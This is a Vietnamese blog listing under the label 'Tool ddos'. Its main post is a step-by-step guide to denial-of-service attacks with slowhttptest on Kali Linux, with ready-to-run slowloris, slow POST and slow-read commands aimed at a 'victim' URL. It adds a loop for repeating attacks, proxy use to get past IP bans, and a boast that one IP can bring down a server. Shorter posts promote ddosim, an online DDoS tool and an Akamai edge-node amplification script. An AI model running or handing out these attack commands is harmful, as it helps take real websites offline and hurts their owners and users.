Hiển thị các bài đăng có nhãn Tool ddos. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn Tool ddos. Hiển thị tất cả bài đăng

15/4/16

DDos với kĩ thuật slowhttptest trong kali linux

DDos với kĩ thuật slowhttptest trong kali linux, Hướng dẫn ddos với kĩ thuật slowhttptest trong kali linux : slowloris, slow HTTP POST và slow Read, ddos trên kali linux

SlowHTTPTest là một công cụ cấu hình nâng cao, mô phỏng một cuộc tấn công từ chối dịch vụ. Nó hoạt động trên hầu hết các nền tảng Linux, OSX và Cygwin và một môi trường giống Unix, giao diện command-line cho Microsoft Windows.

Nó thực hiện các cuộc tấn công tại tầng ứng dụng và tấn công vào băng thông thấp phổ biến như các cuộc tấn công slowloris, Slow HTTP POST, Slow Read (dựa trên giao thức TCP với thời gian khai thác kéo dài), cũng như tấn công Apache Range Header bằng cách gây quá tải bộ nhớ và CPU trên máy chủ.

Slowloris và Slow HTTP POST DoS tấn công dựa trên các giao thức HTTP vốn thiết kế đòi hỏi các request phải hoàn toàn được nhận bởi máy chủ trước khi được thực thi. Nếu một request HTTP không đầy đủ hoặc nếu tốc độ truyền tải thấp, máy chủ phải giữ nguồn tài nguyên đó ở chế độ busy và chờ đợi phần còn lại của dữ liệu. Nếu máy chủ giữ quá nhiều tài nguyền busy sẽ gây ra từ chối dịch vụ và không thể đáp ứng các yêu cầu khác. Công cụ này gửi các request HTTP không đầy đủ và cố gắng thực hiện một cuộc tấn công từ chối dịch vụ để kiểm tra khả năng chịu tải của máy chủ HTTP.

1, Cài đặt Slowhttptest


*Kali Linux:
1apt-get install slowhttptest

*Với những bản Linux khác:
Download tại đây
1$ tar -xzvf slowhttptest-x.x.tar.gz
$ cd slowhttptest-x.x
$ ./configure --prefix=PREFIX
$ make
$ sudo make install
PREFIX là nơi bạn cài đặt

*Với MAC OSX:

Sử dụng Homebrew

1brew update && brew install slowhttptest

2, Sử dụng slowhttptest
a, Tấn công slow message body


1slowhttptest -c 1000 -B -i 110 -r 200 -s 8192 -t FAKEVERB -u https://victim/loginform.html -x 10 -p 3

Với đồ thị

1slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u https://victim/loginform.html -x 10 -p 3

b, Tấn công slowloris

1slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://victim/index.html -x 24 -p 3

Với đồ thị

slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://victim/index.html -x 24 -p 3

c, Tấn công slow read mode với proxy

1slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://someserver/somebigresource -p 5 -l 350 -e x.x.x.x:8080

Mặc định các cách thức tấn công đều giới hạn 240 giây, để có thể tấn công nhiều hơn bạn sử dụng với tùy chọn -l

1-l 10000

Ở trên là tùy chọn sẽ tấn công với 10000 giây

Để tấn công lặp đi lặp lại, đối với những website hạn chế htaccess theo mỗi IP, ta có thể dùng vòng lặp như sau


1while true; do "câu lệnh tấn công"; sleep 30; done

Để sử dụng proxy bạn có thể lấy ở site https://incloak.com/proxy-list/

3, Xuất ra thống kê
Bảng thống kê biểu đồ tấn công

Với tùy chọn -g bạn sẽ nhận được 2 file CSV và HTML để xem thống kê

Những dòng thông báo khi bạn sử dụng slowhttptest

“Hit test time limit” Hết thời gian với tùy chọn -l
"No open connections left" Tất cả kết nối được ngắt
“Cannot establish connection” Không có kết nối nào được thiết lập trong N giây đầu tiên của việc tấn công, trong đó N là một trong hai giá trị của các đối số -i, hoặc 10, nếu không được thiết lập. Điều này sẽ xảy ra nếu không tấn công được đến host hoặc việc remote peer bị gián đoạn
“Connection refused” Việc kết nối peer không được chấp nhận (Có thể IP của bạn bị cấm, hãy thử sử dụng proxy xem sao)
“Cancelled by user” bạn nhấn Ctrl-C hoặc gửi SIGINT trong một số cách khác
“Unexpected error” Lỗi không xác định

Tôi thử tấn công localhost để thử nghiệm xem thông tin gì xuất hiện bên phía máy chủ của nạn nhân


1slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://www.localhost.com -x 10 -p 3

DDos với kĩ thuật slowhttptest trong kali linux, Hướng dẫn ddos với kĩ thuật slowhttptest trong kali linux : slowloris, slow HTTP POST và slow Read, ddos trên kali linux

Đây là thông báo từ server của nạn nhân

1rootuser@localhost [/home]# pgrep httpd | wc -l
151

Tôi cũng thử truy cập vào /var/log/messages để xem 


1rootuser@someserver [/var/log]# tail -100 message | grep Firewall

Sep 23 11:43:39 someserver: IP 1.2.3.4 (XX/Anonymous/1-2-3-4) found to have 504 connections

Như bạn đã thấy, chỉ với 504 kết nối trong 85 giây từ 1 địa chỉ IP đã đủ kết thúc một server !
Tìm Kiếm Google : 

  • DDos với kĩ thuật slowhttptest trong kali linux
  • kỹ thuật ddos trên kali linux
  • Tool ddos trên kali linux
  • DDos slowhttptest trong kali linux
  • ddos slowhttptest slow HTTP POST và slow Read

5/4/16

Tool ddos online f5



TOOL DDOS ONLINE - ANONSEC TEAM
Link Website:

DDosim ( Tool ddos cực mạnh )

ddosim, tool ddosim cực mạnh, ddosim tool, tool ddosim mạnh, ddosim attack mạnh, tool ddos mạnh mẽ, tool ddos việt nam

ddosim là một công cụ có thể được sử dụng trong một môi trường phòng thí nghiệm để mô phỏng một tấn công từ chối dịch vụ (DDOS) tấn công chống lại một máy chủ mục tiêu. Xét nghiệm này sẽ cho thấy khả năng của máy chủ để xử lý các ứng dụng các cuộc tấn công DDOS cụ thể. Ddosim mô phỏng một số máy zombie (có địa chỉ IP ngẫu nhiên) mà tạo ra các kết nối TCP đầy đủ đến các máy chủ mục tiêu. Sau khi hoàn thành việc kết nối, ddosim bắt đầu cuộc trò chuyện với các ứng dụng nghe (ví dụ như HTTP server).

2/4/16

Tool ddos Akamai cực mạnh

Tool ddos Akamai, tool ddos python akamai, python akamai, tool ddos kali linux cực mạnh, tool ddos kali mới nhất, phần mềm ddos linux

Akamai tự hào khoảng 100.000 nút cạnh trên khắp thế giới trong đó cung cấp cân bằng tải, tường lửa ứng dụng web, bộ nhớ đệm vv, để đảm bảo rằng một số lượng tối thiểu các yêu cầu thực sự đạt nguồn gốc máy chủ web beign của bạn được bảo vệ. Tuy nhiên, vấn đề với bộ nhớ đệm là bạn không thể nhớ cache cái gì đó là không xác định, IE kết quả tìm kiếm. Một tìm kiếm mà không được yêu cầu trước khi có khả năng không có trong bộ nhớ cache, và sẽ dẫn đến một Cache-Hoa hậu, và các nút cạnh Akamai yêu cầu tài nguyên từ máy chủ gốc của chính nó.

Những công cụ này không có gì là, cung cấp một danh sách các nút cạnh Akamai và một bộ nhớ cache có giá trị mất tích yêu cầu, sản xuất nhiều yêu cầu mà trúng máy chủ gốc thông qua các nút cạnh Akamai. Như bạn có thể tưởng tượng, nếu bạn có 50 địa chỉ IP dưới sự kiểm soát của bạn, gửi yêu cầu vào khoảng 20 mỗi giây, với 100.000 Akamai danh sách nút cạnh, và một yêu cầu mà kết quả là 10KB đánh xứ, nếu tính toán của tôi là chính xác, thats khoảng 976MB / ps đánh máy chủ gốc, đó là một địa ngục của rất nhiều giao thông.

Cách sử dụng

# Python ARDT_Akamai_EdgeNode_Finder.py